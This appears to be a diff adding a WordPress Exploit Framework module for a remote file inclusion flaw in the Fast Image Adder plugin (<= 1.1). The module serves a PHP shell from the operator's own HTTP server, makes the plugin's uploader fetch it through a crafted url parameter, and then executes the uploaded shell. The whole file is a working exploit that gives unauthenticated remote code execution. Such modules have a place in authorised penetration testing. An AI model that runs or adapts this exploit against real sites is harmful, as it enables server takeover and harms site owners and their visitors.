|
| 1 | +require 'erb' |
| 2 | + |
| 3 | +class Wpxf::Exploit::FastImageAdderV11RfiShellUpload < Wpxf::Module |
| 4 | + include Wpxf |
| 5 | + include Wpxf::Net::HttpServer |
| 6 | + include Wpxf::WordPress::ShellUpload |
| 7 | + include ERB::Util |
| 8 | + |
| 9 | + def initialize |
| 10 | + super |
| 11 | + |
| 12 | + update_info( |
| 13 | + name: 'Fast Image Adder <= 1.1 RFI Shell Upload', |
| 14 | + desc: %( |
| 15 | + Fast Image Adder <= 1.1 suffers from a remote file inclusion vulnerability |
| 16 | + which allows unauthenticated users to download and execute a PHP shell |
| 17 | + hosted on a remote server. |
| 18 | +
|
| 19 | + This module will host a HTTP server to serve the payload, and make a request |
| 20 | + to the target that will initiate the download and execution of the payload. |
| 21 | + ), |
| 22 | + author: [ |
| 23 | + 'Larry W. Cashdollar', # Discovery and disclosure |
| 24 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 25 | + ], |
| 26 | + references: [ |
| 27 | + ['WPVDB', '8092'], |
| 28 | + ['URL', 'http://www.vapid.dhs.org/advisory.php?v=139'] |
| 29 | + ], |
| 30 | + date: 'Jul 10 2015' |
| 31 | + ) |
| 32 | + |
| 33 | + register_options([ |
| 34 | + StringOption.new( |
| 35 | + name: 'rfi_host', |
| 36 | + desc: 'The address of the host listening for a connection', |
| 37 | + required: true |
| 38 | + ), |
| 39 | + StringOption.new( |
| 40 | + name: 'rfi_path', |
| 41 | + desc: 'The path to access via the remote file inclusion request', |
| 42 | + default: Utility::Text.rand_alpha(8), |
| 43 | + required: true |
| 44 | + ) |
| 45 | + ]) |
| 46 | + end |
| 47 | + |
| 48 | + def check |
| 49 | + check_plugin_version_from_readme('fast-image-adder', '1.2') |
| 50 | + end |
| 51 | + |
| 52 | + def rfi_host |
| 53 | + normalized_option_value('rfi_host') |
| 54 | + end |
| 55 | + |
| 56 | + def rfi_path |
| 57 | + normalized_option_value('rfi_path') |
| 58 | + end |
| 59 | + |
| 60 | + def rfi_url |
| 61 | + "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}" |
| 62 | + end |
| 63 | + |
| 64 | + def on_http_request(_path, _params, _headers) |
| 65 | + payload.encoded |
| 66 | + end |
| 67 | + |
| 68 | + def uploader_url |
| 69 | + normalize_uri(wordpress_url_plugins, 'fast-image-adder', "fast-image-adder-uploader.php?confirm=url&url=#{url_encode(rfi_url)}") |
| 70 | + end |
| 71 | + |
| 72 | + def uploaded_payload_location |
| 73 | + upload_result.body[/Uploaded as (.+?)\s/i, 1] |
| 74 | + end |
| 75 | + |
| 76 | + def payload_body_builder |
| 77 | + Utility::BodyBuilder.new |
| 78 | + end |
| 79 | + |
| 80 | + def execute_payload(url) |
| 81 | + stop_http_server |
| 82 | + super(url) |
| 83 | + end |
| 84 | + |
| 85 | + def run |
| 86 | + start_http_server true |
| 87 | + super |
| 88 | + end |
| 89 | +end |
0 commit comments